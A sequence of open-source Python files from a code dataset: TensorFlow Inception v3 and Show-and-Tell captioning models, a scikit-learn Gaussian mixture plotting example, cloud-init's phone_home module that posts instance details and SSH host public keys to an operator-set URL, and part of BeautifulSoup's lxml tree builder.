branch_0 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
branch_0 = layers.conv2d(
branch_0,
depth(320), [3, 3],
stride=2,
padding='VALID',
scope='Conv2d_1a_3x3')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(192), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = layers.conv2d(
branch_1, depth(192), [1, 7], scope='Conv2d_0b_1x7')
branch_1 = layers.conv2d(
branch_1, depth(192), [7, 1], scope='Conv2d_0c_7x1')
branch_1 = layers.conv2d(
branch_1,
depth(192), [3, 3],
stride=2,
padding='VALID',
scope='Conv2d_1a_3x3')
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers_lib.max_pool2d(
net, [3, 3], stride=2, padding='VALID', scope='MaxPool_1a_3x3')
net = array_ops.concat([branch_0, branch_1, branch_2], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_9: 8 x 8 x 2048.
end_point = 'Mixed_7b'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(320), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(384), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = array_ops.concat(
[
layers.conv2d(
branch_1, depth(384), [1, 3], scope='Conv2d_0b_1x3'),
layers.conv2d(
branch_1, depth(384), [3, 1], scope='Conv2d_0b_3x1')
],
3)
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(448), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(384), [3, 3], scope='Conv2d_0b_3x3')
branch_2 = array_ops.concat(
[
layers.conv2d(
branch_2, depth(384), [1, 3], scope='Conv2d_0c_1x3'),
layers.conv2d(
branch_2, depth(384), [3, 1], scope='Conv2d_0d_3x1')
],
3)
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(192), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
# mixed_10: 8 x 8 x 2048.
end_point = 'Mixed_7c'
with variable_scope.variable_scope(end_point):
with variable_scope.variable_scope('Branch_0'):
branch_0 = layers.conv2d(
net, depth(320), [1, 1], scope='Conv2d_0a_1x1')
with variable_scope.variable_scope('Branch_1'):
branch_1 = layers.conv2d(
net, depth(384), [1, 1], scope='Conv2d_0a_1x1')
branch_1 = array_ops.concat(
[
layers.conv2d(
branch_1, depth(384), [1, 3], scope='Conv2d_0b_1x3'),
layers.conv2d(
branch_1, depth(384), [3, 1], scope='Conv2d_0c_3x1')
],
3)
with variable_scope.variable_scope('Branch_2'):
branch_2 = layers.conv2d(
net, depth(448), [1, 1], scope='Conv2d_0a_1x1')
branch_2 = layers.conv2d(
branch_2, depth(384), [3, 3], scope='Conv2d_0b_3x3')
branch_2 = array_ops.concat(
[
layers.conv2d(
branch_2, depth(384), [1, 3], scope='Conv2d_0c_1x3'),
layers.conv2d(
branch_2, depth(384), [3, 1], scope='Conv2d_0d_3x1')
],
3)
with variable_scope.variable_scope('Branch_3'):
branch_3 = layers_lib.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = layers.conv2d(
branch_3, depth(192), [1, 1], scope='Conv2d_0b_1x1')
net = array_ops.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points[end_point] = net
if end_point == final_endpoint:
return net, end_points
raise ValueError('Unknown final endpoint %s' % final_endpoint)
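# A usage sketch for the base network (an assumption, not part of this file):
# truncate the graph at an intermediate endpoint, e.g. for feature extraction.
#
# net, end_points = inception_v3_base(images, final_endpoint='Mixed_6e')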
def inception_v3(inputs,
num_classes=1000,
is_training=True,
dropout_keep_prob=0.8,
min_depth=16,
depth_multiplier=1.0,
prediction_fn=layers_lib.softmax,
spatial_squeeze=True,
reuse=None,
scope='InceptionV3'):
"""Inception model from http://arxiv.org/abs/1512.00567.
"Rethinking the Inception Architecture for Computer Vision"
Christian Szegedy, Vincent Vanhoucke, Sergey Ioffe, Jonathon Shlens,
Zbigniew Wojna.
With the default arguments this method constructs the exact model defined in
the paper. However, one can experiment with variations of the inception_v3
network by changing arguments dropout_keep_prob, min_depth and
depth_multiplier.
The default image size used to train this network is 299x299.
Args:
inputs: a tensor of size [batch_size, height, width, channels].
num_classes: number of predicted classes.
is_training: whether is training or not.
dropout_keep_prob: the percentage of activation values that are retained.
min_depth: Minimum depth value (number of channels) for all convolution ops.
Enforced when depth_multiplier < 1, and not an active constraint when
depth_multiplier >= 1.
depth_multiplier: Float multiplier for the depth (number of channels)
for all convolution ops. The value must be greater than zero. Typical
usage will be to set this value in (0, 1) to reduce the number of
parameters or computation cost of the model.
prediction_fn: a function to get predictions out of logits.
spatial_squeeze: if True, logits is of shape [B, C]; if False, logits is
of shape [B, 1, 1, C], where B is batch_size and C is number of classes.
reuse: whether or not the network and its variables should be reused. To be
able to reuse 'scope' must be given.
scope: Optional variable_scope.
Returns:
logits: the pre-softmax activations, a tensor of size
[batch_size, num_classes]
end_points: a dictionary from components of the network to the corresponding
activation.
Raises:
ValueError: if 'depth_multiplier' is less than or equal to zero.
"""
if depth_multiplier <= 0:
raise ValueError('depth_multiplier is not greater than zero.')
depth = lambda d: max(int(d * depth_multiplier), min_depth)
with variable_scope.variable_scope(
scope, 'InceptionV3', [inputs, num_classes], reuse=reuse) as scope:
with arg_scope(
[layers_lib.batch_norm, layers_lib.dropout], is_training=is_training):
net, end_points = inception_v3_base(
inputs,
scope=scope,
min_depth=min_depth,
depth_multiplier=depth_multiplier)
# Auxiliary Head logits
with arg_scope(
[layers.conv2d, layers_lib.max_pool2d, layers_lib.avg_pool2d],
stride=1,
padding='SAME'):
aux_logits = end_points['Mixed_6e']
with variable_scope.variable_scope('AuxLogits'):
aux_logits = layers_lib.avg_pool2d(
aux_logits, [5, 5],
stride=3,
padding='VALID',
scope='AvgPool_1a_5x5')
aux_logits = layers.conv2d(
aux_logits, depth(128), [1, 1], scope='Conv2d_1b_1x1')
# Shape of feature map before the final layer.
kernel_size = _reduced_kernel_size_for_small_input(aux_logits, [5, 5])
aux_logits = layers.conv2d(
aux_logits,
depth(768),
kernel_size,
weights_initializer=trunc_normal(0.01),
padding='VALID',
scope='Conv2d_2a_{}x{}'.format(*kernel_size))
aux_logits = layers.conv2d(
aux_logits,
num_classes, [1, 1],
activation_fn=None,
normalizer_fn=None,
weights_initializer=trunc_normal(0.001),
scope='Conv2d_2b_1x1')
if spatial_squeeze:
aux_logits = array_ops.squeeze(
aux_logits, [1, 2], name='SpatialSqueeze')
end_points['AuxLogits'] = aux_logits
# Final pooling and prediction
with variable_scope.variable_scope('Logits'):
kernel_size = _reduced_kernel_size_for_small_input(net, [8, 8])
net = layers_lib.avg_pool2d(
net,
kernel_size,
padding='VALID',
scope='AvgPool_1a_{}x{}'.format(*kernel_size))
# 1 x 1 x 2048
net = layers_lib.dropout(
net, keep_prob=dropout_keep_prob, scope='Dropout_1b')
end_points['PreLogits'] = net
# 2048
logits = layers.conv2d(
net,
num_classes, [1, 1],
activation_fn=None,
normalizer_fn=None,
scope='Conv2d_1c_1x1')
if spatial_squeeze:
logits = array_ops.squeeze(logits, [1, 2], name='SpatialSqueeze')
# 1000
end_points['Logits'] = logits
end_points['Predictions'] = prediction_fn(logits, scope='Predictions')
return logits, end_points
inception_v3.default_image_size = 299
def _reduced_kernel_size_for_small_input(input_tensor, kernel_size):
"""Define kernel size which is automatically reduced for small input.
If the shape of the input images is unknown at graph construction time, this
function assumes that the input images are large enough.
Args:
input_tensor: input tensor of size [batch_size, height, width, channels].
kernel_size: desired kernel size of length 2: [kernel_height, kernel_width]
Returns:
a tensor with the kernel size.
TODO(jrru): Make this function work with unknown shapes. Theoretically, this
can be done with the code below. Problems are two-fold: (1) If the shape was
known, it will be lost. (2) inception.tf.contrib.slim.ops._two_element_tuple
cannot handle tensors that define the kernel size.
shape = tf.shape(input_tensor)
return tf.stack([tf.minimum(shape[1], kernel_size[0]),
tf.minimum(shape[2], kernel_size[1])])
"""
shape = input_tensor.get_shape().as_list()
if shape[1] is None or shape[2] is None:
kernel_size_out = kernel_size
else:
kernel_size_out = [
min(shape[1], kernel_size[0]), min(shape[2], kernel_size[1])
]
return kernel_size_out
def inception_v3_arg_scope(weight_decay=0.00004,
stddev=0.1,
batch_norm_var_collection='moving_vars'):
"""Defines the default InceptionV3 arg scope.
Args:
weight_decay: The weight decay to use for regularizing the model.
stddev: The standard deviation of the truncated normal weight initializer.
batch_norm_var_collection: The name of the collection for the batch norm
variables.
Returns:
An `arg_scope` to use for the inception v3 model.
"""
batch_norm_params = {
# Decay for the moving averages.
'decay': 0.9997,
# epsilon to prevent 0s in variance.
'epsilon': 0.001,
# collection containing update_ops.
'updates_collections': ops.GraphKeys.UPDATE_OPS,
# collection containing the moving mean and moving variance.
'variables_collections': {
'beta': None,
'gamma': None,
'moving_mean': [batch_norm_var_collection],
'moving_variance': [batch_norm_var_collection],
}
}
# Set weight_decay for weights in Conv and FC layers.
with arg_scope(
[layers.conv2d, layers_lib.fully_connected],
weights_regularizer=regularizers.l2_regularizer(weight_decay)):
with arg_scope(
[layers.conv2d],
weights_initializer=init_ops.truncated_normal_initializer(
stddev=stddev),
activation_fn=nn_ops.relu,
normalizer_fn=layers_lib.batch_norm,
normalizer_params=batch_norm_params) as sc:
return sc
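# A minimal end-to-end sketch (illustrative assumption): build the classifier
# under its default arg_scope. `images` is a hypothetical input placeholder.
#
# import tensorflow as tf
# images = tf.placeholder(tf.float32, [32, 299, 299, 3])
# with arg_scope(inception_v3_arg_scope()):
#     logits, end_points = inception_v3(images, num_classes=1000, is_training=True)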
| apache-2.0 |
mlperf/training_results_v0.5 | v0.5.0/google/cloud_v2.8/ssd-tpuv2-8/code/ssd/model/tpu/models/experimental/show_and_tell/show_and_tell_model.py | 5 | 13300 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Image-to-text implementation based on http://arxiv.org/abs/1411.4555.
"Show and Tell: A Neural Image Caption Generator"
Oriol Vinyals, Alexander Toshev, Samy Bengio, Dumitru Erhan
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Standard Imports
import tensorflow as tf
import image_embedding
import image_processing
import inputs as input_ops
class ShowAndTellModel(object):
"""Image-to-text implementation based on http://arxiv.org/abs/1411.4555.
"Show and Tell: A Neural Image Caption Generator"
Oriol Vinyals, Alexander Toshev, Samy Bengio, Dumitru Erhan
"""
def __init__(self, config, mode, train_inception=False):
"""Basic setup.
Args:
config: Object containing configuration parameters.
mode: "train", "eval" or "inference".
train_inception: Whether the inception submodel variables are trainable.
"""
assert mode in ["train", "eval", "inference"]
self.config = config
self.mode = mode
self.train_inception = train_inception
# To match the "Show and Tell" paper we initialize all variables with a
# random uniform initializer.
self.initializer = tf.random_uniform_initializer(
minval=-self.config.initializer_scale,
maxval=self.config.initializer_scale)
# A float32 Tensor with shape [batch_size, height, width, channels].
self.images = None
# An int32 Tensor with shape [batch_size, padded_length].
self.input_seqs = None
# An int32 Tensor with shape [batch_size, padded_length].
self.target_seqs = None
# An int32 0/1 Tensor with shape [batch_size, padded_length].
self.input_mask = None
# A float32 Tensor with shape [batch_size, embedding_size].
self.image_embeddings = None
# A float32 Tensor with shape [batch_size, padded_length, embedding_size].
self.seq_embeddings = None
# A float32 scalar Tensor; the total loss for the trainer to optimize.
self.total_loss = None
# A float32 Tensor with shape [batch_size * padded_length].
self.target_cross_entropy_losses = None
# A float32 Tensor with shape [batch_size * padded_length].
self.target_cross_entropy_loss_weights = None
# Collection of variables from the inception submodel.
self.inception_variables = []
# Function to restore the inception submodel from checkpoint.
self.init_fn = None
# Global step Tensor.
self.global_step = None
def is_training(self):
"""Returns true if the model is built for training mode."""
return self.mode == "train"
def load_image(self, encoded_image, thread_id=0):
"""Decodes and processes an image string.
Args:
encoded_image: A scalar string Tensor; the encoded image.
thread_id: Preprocessing thread id used to select the ordering of color
distortions.
Returns:
A float32 Tensor of shape [height, width, 3]; the processed image.
"""
return image_processing.process_image(
encoded_image,
is_training=self.is_training(),
height=self.config.image_height,
width=self.config.image_width,
thread_id=thread_id,
image_format=self.config.image_format)
def distort_images(self, images, seed):
"""Distort a batch of images.
(Processing a batch allows us to easily switch between TPU and CPU
execution).
"""
if self.mode == "train":
images = image_processing.distort_image(images, seed)
# Rescale to [-1,1] instead of [0, 1]
images = tf.subtract(images, 0.5)
images = tf.multiply(images, 2.0)
return images
def build_inputs(self):
"""Input prefetching, preprocessing and batching.
Outputs:
self.images
self.input_seqs
self.target_seqs (training and eval only)
self.input_mask (training and eval only)
"""
if self.mode == "inference":
# In inference mode, images and inputs are fed via placeholders.
image_feed = tf.placeholder(dtype=tf.string, shape=[], name="image_feed")
input_feed = tf.placeholder(
dtype=tf.int64,
shape=[None], # batch_size
name="input_feed")
# Process image and insert batch dimensions.
images = tf.expand_dims(self.load_image(image_feed), 0)
input_seqs = tf.expand_dims(input_feed, 1)
# No target sequences or input mask in inference mode.
target_seqs = None
input_mask = None
else:
def _load_example(serialized_example):
encoded_image, caption = input_ops.parse_example(
serialized_example,
image_feature=self.config.image_feature_name,
caption_feature=self.config.caption_feature_name)
image = self.load_image(encoded_image)
# strings.split expects a batch
words = tf.strings.split(tf.reshape(caption, [1]), sep=" ")
words = tf.sparse_tensor_to_dense(words, default_value="")[0]
word_idx = tf.strings.to_hash_bucket(words, self.config.vocab_size)
input_seqs, target_seqs, input_mask = input_ops.pad_caption_to_input(
word_idx)
return image, input_seqs, target_seqs, input_mask
def _load_dataset(filename):
return tf.data.TFRecordDataset(filename, buffer_size=16 * 1024 * 1024)
df = tf.data.Dataset.list_files(
self.config.input_file_pattern, shuffle=self.mode == "train")
df = df.apply(
tf.data.experimental.parallel_interleave(
_load_dataset, cycle_length=64, sloppy=True))
if self.mode == "train":
df = df.repeat()
df = df.shuffle(1024)
df = df.apply(
tf.data.experimental.map_and_batch(
_load_example,
self.config.batch_size,
num_parallel_batches=8,
drop_remainder=True))
df = df.prefetch(8)
images, input_seqs, target_seqs, input_mask = df.make_one_shot_iterator(
).get_next()
self.images = images
self.input_seqs = input_seqs
self.target_seqs = target_seqs
self.input_mask = input_mask
def build_image_embeddings(self, images):
"""Builds the image model subgraph and generates image embeddings.
Inputs:
images
Outputs:
self.image_embeddings
"""
images = self.distort_images(images, tf.train.get_or_create_global_step())
inception_output = image_embedding.inception_v3(
images,
trainable=self.train_inception,
is_training=self.is_training(),
add_summaries=False)
self.inception_variables = tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, scope="InceptionV3")
# Map inception output into embedding space.
with tf.variable_scope("image_embedding") as scope:
image_embeddings = tf.contrib.layers.fully_connected(
inputs=inception_output,
num_outputs=self.config.embedding_size,
activation_fn=None,
weights_initializer=self.initializer,
biases_initializer=None,
scope=scope)
# Save the embedding size in the graph.
tf.constant(self.config.embedding_size, name="embedding_size")
return image_embeddings
def build_seq_embeddings(self, input_seqs):
"""Builds the input sequence embeddings.
Inputs:
input_seqs
Outputs:
self.seq_embeddings
"""
with tf.variable_scope("seq_embedding"), tf.device("/cpu:0"):
embedding_map = tf.get_variable(
name="map",
shape=[self.config.vocab_size, self.config.embedding_size],
initializer=self.initializer)
seq_embeddings = tf.nn.embedding_lookup(embedding_map, input_seqs)
return seq_embeddings
def build_model(self):
"""Builds the model.
Inputs:
self.image_embeddings
self.seq_embeddings
self.target_seqs (training and eval only)
self.input_mask (training and eval only)
Outputs:
self.total_loss (training and eval only)
self.target_cross_entropy_losses (training and eval only)
self.target_cross_entropy_loss_weights (training and eval only)
"""
# This LSTM cell has biases and outputs tanh(new_c) * sigmoid(o), but the
# modified LSTM in the "Show and Tell" paper has no biases and outputs
# new_c * sigmoid(o).
lstm_cell = tf.contrib.rnn.BasicLSTMCell(
num_units=self.config.num_lstm_units, state_is_tuple=True)
if self.mode == "train":
lstm_cell = tf.contrib.rnn.DropoutWrapper(
lstm_cell,
input_keep_prob=self.config.lstm_dropout_keep_prob,
output_keep_prob=self.config.lstm_dropout_keep_prob)
with tf.variable_scope("lstm", initializer=self.initializer) as lstm_scope:
# Feed the image embeddings to set the initial LSTM state.
zero_state = lstm_cell.zero_state(
batch_size=self.image_embeddings.get_shape()[0], dtype=tf.float32)
_, initial_state = lstm_cell(self.image_embeddings, zero_state)
# Allow the LSTM variables to be reused.
lstm_scope.reuse_variables()
if self.mode == "inference":
# In inference mode, use concatenated states for convenient feeding and
# fetching.
tf.concat(initial_state, 1, name="initial_state")
# Placeholder for feeding a batch of concatenated states.
state_feed = tf.placeholder(
dtype=tf.float32,
shape=[None, sum(lstm_cell.state_size)],
name="state_feed")
state_tuple = tf.split(value=state_feed, num_or_size_splits=2, axis=1)
# Run a single LSTM step.
lstm_outputs, state_tuple = lstm_cell(
inputs=tf.squeeze(self.seq_embeddings, squeeze_dims=[1]),
state=state_tuple)
# Concatenate the resulting state.
tf.concat(state_tuple, 1, name="state")
else:
# Run the batch of sequence embeddings through the LSTM.
sequence_length = tf.reduce_sum(self.input_mask, 1)
lstm_outputs, _ = tf.nn.dynamic_rnn(
cell=lstm_cell,
inputs=self.seq_embeddings,
sequence_length=sequence_length,
initial_state=initial_state,
dtype=tf.float32,
scope=lstm_scope)
# Stack batches vertically.
lstm_outputs = tf.reshape(lstm_outputs, [-1, lstm_cell.output_size])
with tf.variable_scope("logits") as logits_scope:
logits = tf.contrib.layers.fully_connected(
inputs=lstm_outputs,
num_outputs=self.config.vocab_size,
activation_fn=None,
weights_initializer=self.initializer,
scope=logits_scope)
if self.mode == "inference":
tf.nn.softmax(logits, name="softmax")
else:
targets = tf.reshape(self.target_seqs, [-1])
weights = tf.to_float(tf.reshape(self.input_mask, [-1]))
# Compute losses.
losses = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=targets, logits=logits)
batch_loss = tf.div(
tf.reduce_sum(tf.multiply(losses, weights)),
tf.reduce_sum(weights),
name="batch_loss")
tf.losses.add_loss(batch_loss)
total_loss = tf.losses.get_total_loss()
self.total_loss = total_loss
self.target_cross_entropy_losses = losses # Used in evaluation.
self.target_cross_entropy_loss_weights = weights # Used in evaluation.
def setup_inception_initializer(self):
"""Sets up the function to restore inception variables from checkpoint."""
if self.mode != "inference":
# Restore inception variables only.
saver = tf.train.Saver(self.inception_variables)
def restore_fn(sess):
tf.logging.info("Restoring Inception variables from checkpoint file %s",
self.config.inception_checkpoint_file)
saver.restore(sess, self.config.inception_checkpoint_file)
self.init_fn = restore_fn
def setup_global_step(self):
"""Sets up the global step Tensor."""
self.global_step = tf.train.get_or_create_global_step()
def build_model_for_tpu(self, images, input_seqs, target_seqs, input_mask):
self.image_embeddings = self.build_image_embeddings(images)
self.seq_embeddings = self.build_seq_embeddings(target_seqs)
self.target_seqs = target_seqs
self.input_mask = input_mask
self.build_model()
def build(self):
"""Creates all ops for training and evaluation."""
self.build_inputs()
self.image_embeddings = self.build_image_embeddings(self.images)
self.seq_embeddings = self.build_seq_embeddings(self.input_seqs)
self.build_model()
self.setup_inception_initializer()
self.setup_global_step()
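# A minimal usage sketch (assumed; `ModelConfig` is hypothetical and must
# provide the attributes read above, e.g. input_file_pattern, batch_size,
# vocab_size, embedding_size and num_lstm_units):
#
# config = ModelConfig()
# model = ShowAndTellModel(config, mode="train", train_inception=False)
# model.build()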
| apache-2.0 |
h2educ/scikit-learn | examples/mixture/plot_gmm_sin.py | 248 | 2747 | """
=================================
Gaussian Mixture Model Sine Curve
=================================
This example highlights the advantages of the Dirichlet Process:
complexity control and dealing with sparse data. The dataset is formed
by 100 points loosely spaced following a noisy sine curve. The fit by
the GMM class, using the expectation-maximization algorithm to fit a
mixture of 10 Gaussian components, finds too-small components and very
little structure. The fits by the Dirichlet process, however, show
that the model can either learn a global structure for the data (small
alpha) or easily interpolate to finding relevant local structure
(large alpha), never falling into the problems shown by the GMM class.
"""
import itertools
import numpy as np
from scipy import linalg
import matplotlib.pyplot as plt
import matplotlib as mpl
from sklearn import mixture
from sklearn.externals.six.moves import xrange
# Number of samples per component
n_samples = 100
# Generate random sample following a sine curve
np.random.seed(0)
X = np.zeros((n_samples, 2))
step = 4 * np.pi / n_samples
for i in xrange(X.shape[0]):
x = i * step - 6
X[i, 0] = x + np.random.normal(0, 0.1)
X[i, 1] = 3 * (np.sin(x) + np.random.normal(0, .2))
color_iter = itertools.cycle(['r', 'g', 'b', 'c', 'm'])
for i, (clf, title) in enumerate([
(mixture.GMM(n_components=10, covariance_type='full', n_iter=100),
"Expectation-maximization"),
(mixture.DPGMM(n_components=10, covariance_type='full', alpha=0.01,
n_iter=100),
"Dirichlet Process,alpha=0.01"),
(mixture.DPGMM(n_components=10, covariance_type='diag', alpha=100.,
n_iter=100),
"Dirichlet Process,alpha=100.")]):
clf.fit(X)
splot = plt.subplot(3, 1, 1 + i)
Y_ = clf.predict(X)
for i, (mean, covar, color) in enumerate(zip(
clf.means_, clf._get_covars(), color_iter)):
# Eigendecompose the covariance to recover the ellipse axes (v) and
# its orientation (from w) for plotting.
v, w = linalg.eigh(covar)
u = w[0] / linalg.norm(w[0])
# as the DP will not use every component it has access to
# unless it needs it, we shouldn't plot the redundant
# components.
if not np.any(Y_ == i):
continue
plt.scatter(X[Y_ == i, 0], X[Y_ == i, 1], .8, color=color)
# Plot an ellipse to show the Gaussian component
angle = np.arctan(u[1] / u[0])
angle = 180 * angle / np.pi # convert to degrees
ell = mpl.patches.Ellipse(mean, v[0], v[1], 180 + angle, color=color)
ell.set_clip_box(splot.bbox)
ell.set_alpha(0.5)
splot.add_artist(ell)
plt.xlim(-6, 4 * np.pi - 6)
plt.ylim(-5, 5)
plt.title(title)
plt.xticks(())
plt.yticks(())
plt.show()
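# A hedged variation sketch (same deprecated sklearn API as above): other
# covariance structures can be compared by swapping the estimator, e.g.
# mixture.DPGMM(n_components=10, covariance_type='spherical', alpha=1., n_iter=100)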
| bsd-3-clause |
racker/cloud-init-debian-pkg | cloudinit/config/cc_phone_home.py | 6 | 3666 | # vi: ts=4 expandtab
#
# Copyright (C) 2011 Canonical Ltd.
# Copyright (C) 2012, 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Scott Moser <scott.moser@canonical.com>
# Author: Juerg Haefliger <juerg.haefliger@hp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from cloudinit import templater
from cloudinit import util
from cloudinit.settings import PER_INSTANCE
frequency = PER_INSTANCE
POST_LIST_ALL = [
'pub_key_dsa',
'pub_key_rsa',
'pub_key_ecdsa',
'instance_id',
'hostname'
]
# phone_home:
# url: http://my.foo.bar/$INSTANCE_ID/
# post: all
# tries: 10
#
# phone_home:
# url: http://my.foo.bar/$INSTANCE_ID/
# post: [ pub_key_dsa, pub_key_rsa, pub_key_ecdsa, instance_id ]
#
def handle(name, cfg, cloud, log, args):
if len(args) != 0:
ph_cfg = util.read_conf(args[0])
else:
if 'phone_home' not in cfg:
log.debug(("Skipping module named %s, "
"no 'phone_home' configuration found"), name)
return
ph_cfg = cfg['phone_home']
if 'url' not in ph_cfg:
log.warn(("Skipping module named %s, "
"no 'url' found in 'phone_home' configuration"), name)
return
url = ph_cfg['url']
post_list = ph_cfg.get('post', 'all')
tries = ph_cfg.get('tries')
try:
tries = int(tries)
except (TypeError, ValueError):
tries = 10
util.logexc(log, "Configuration entry 'tries' is not an integer, "
"using %s instead", tries)
if post_list == "all":
post_list = POST_LIST_ALL
all_keys = {}
all_keys['instance_id'] = cloud.get_instance_id()
all_keys['hostname'] = cloud.get_hostname()
pubkeys = {
'pub_key_dsa': '/etc/ssh/ssh_host_dsa_key.pub',
'pub_key_rsa': '/etc/ssh/ssh_host_rsa_key.pub',
'pub_key_ecdsa': '/etc/ssh/ssh_host_ecdsa_key.pub',
}
for (n, path) in pubkeys.iteritems():
try:
all_keys[n] = util.load_file(path)
except:
util.logexc(log, "%s: failed to open, can not phone home that "
"data!", path)
submit_keys = {}
for k in post_list:
if k in all_keys:
submit_keys[k] = all_keys[k]
else:
submit_keys[k] = None
log.warn(("Requested key %s from 'post'"
" configuration list not available"), k)
# Get them ready to be posted
real_submit_keys = {}
for (k, v) in submit_keys.iteritems():
if v is None:
real_submit_keys[k] = 'N/A'
else:
real_submit_keys[k] = str(v)
# In case the url is parameterized
url_params = {
'INSTANCE_ID': all_keys['instance_id'],
}
url = templater.render_string(url, url_params)
try:
util.read_file_or_url(url, data=real_submit_keys,
retries=tries, sec_between=3,
ssl_details=util.fetch_ssl_details(cloud.paths))
except:
util.logexc(log, "Failed to post phone home data to %s in %s tries",
url, tries)
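# A minimal cloud-config sketch (illustrative; url and values are assumptions,
# following the schema documented in the comments above):
#
# #cloud-config
# phone_home:
#   url: http://example.com/$INSTANCE_ID/
#   post: [ pub_key_rsa, instance_id, hostname ]
#   tries: 5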
| gpl-3.0 |
crookedreyes/py4e-specialization | course-5/week-02/pagerank-ori/bs4/builder/_lxml.py | 24 | 9031 | __all__ = [
'LXMLTreeBuilderForXML',
'LXMLTreeBuilder',
]
from io import BytesIO
from io import StringIO
from lxml import etree
from bs4.element import (
Comment,
Doctype,
NamespacedAttribute,
ProcessingInstruction,
)
from bs4.builder import (
FAST,
HTML,
HTMLTreeBuilder,
PERMISSIVE,
ParserRejectedMarkup,
TreeBuilder,
XML)
from bs4.dammit import EncodingDetector
LXML = 'lxml'
class LXMLTreeBuilderForXML(TreeBuilder):
DEFAULT_PARSER_CLASS = etree.XMLParser
is_xml = True
NAME = "lxml-xml"
ALTERNATE_NAMES = ["xml"]
# Well, it's permissive by XML parser standards.
features = [NAME, LXML, XML, FAST, PERMISSIVE]
CHUNK_SIZE = 512
# This namespace mapping is specified in the XML Namespace
# standard.
DEFAULT_NSMAPS = {'http://www.w3.org/XML/1998/namespace' : "xml"}
def default_parser(self, encoding):
# This can either return a parser object or a class, which
# will be instantiated with default arguments.
if self._default_parser is not None:
return self._default_parser
return etree.XMLParser(
target=self, strip_cdata=False, recover=True, encoding=encoding)
def parser_for(self, encoding):
# Use the default parser.
parser = self.default_parser(encoding)
if callable(parser):
# Instantiate the parser with default arguments
parser = parser(target=self, strip_cdata=False, encoding=encoding)
return parser
def __init__(self, parser=None, empty_element_tags=None):
# TODO: Issue a warning if parser is present but not a
# callable, since that means there's no way to create new
# parsers for different encodings.
self._default_parser = parser
if empty_element_tags is not None:
self.empty_element_tags = set(empty_element_tags)
self.soup = None
self.nsmaps = [self.DEFAULT_NSMAPS]
def _getNsTag(self, tag):
# Split the namespace URL out of a fully-qualified lxml tag
# name. Copied from lxml's src/lxml/sax.py.
if tag[0] == '{':
return tuple(tag[1:].split('}', 1))
else:
return (None, tag)
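# e.g. _getNsTag('{http://www.w3.org/1999/xhtml}body')
# -> ('http://www.w3.org/1999/xhtml', 'body')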
def prepare_markup(self, markup, user_specified_encoding=None,
exclude_encodings=None,
document_declared_encoding=None):
"""
:yield: A series of 4-tuples.
(markup, encoding, declared encoding,
has undergone character replacement)
Each 4-tuple represents a strategy for parsing the document.
"""
if isinstance(markup, str):
# We were given Unicode. Maybe lxml can parse Unicode on
# this system?
yield markup, None, document_declared_encoding, False
if isinstance(markup, str):
# No, apparently not. Convert the Unicode to UTF-8 and
# tell lxml to parse it as UTF-8.
yield (markup.encode("utf8"), "utf8",
document_declared_encoding, False)
# Instead of using UnicodeDammit to convert the bytestring to
# Unicode using different encodings, use EncodingDetector to
# iterate over the encodings, and tell lxml to try to parse
# the document as each one in turn.
is_html = not self.is_xml
try_encodings = [user_specified_encoding, document_declared_encoding]
detector = EncodingDetector(
markup, try_encodings, is_html, exclude_encodings)
for encoding in detector.encodings:
yield (detector.markup, encoding, document_declared_encoding, False)
def feed(self, markup):
if isinstance(markup, bytes):
markup = BytesIO(markup)
elif isinstance(markup, str):
markup = StringIO(markup)
# Call feed() at least once, even if the markup is empty,
# or the parser won't be initialized.
data = markup.read(self.CHUNK_SIZE)
try:
self.parser = self.parser_for(self.soup.original_encoding)
self.parser.feed(data)
while len(data) != 0:
# Now call feed() on the rest of the data, chunk by chunk.
data = markup.read(self.CHUNK_SIZE)
if len(data) != 0:
self.parser.feed(data)
self.parser.close()
except (UnicodeDecodeError, LookupError, etree.ParserError) as e:
raise ParserRejectedMarkup(str(e))
def close(self):
self.nsmaps = [self.DEFAULT_NSMAPS]
def start(self, name, attrs, nsmap={}):
# Make sure attrs is a mutable dict--lxml may send an immutable dictproxy.
attrs = dict(attrs)
nsprefix = None
# Invert each namespace map as it comes in.
if len(self.nsmaps) > 1:
# There are no new namespaces for this tag, but
# non-default namespaces are in play, so we need a
# separate tag stack to know when they end.
self.nsmaps.append(None)
elif len(nsmap) > 0:
# A new namespace mapping has come into play.
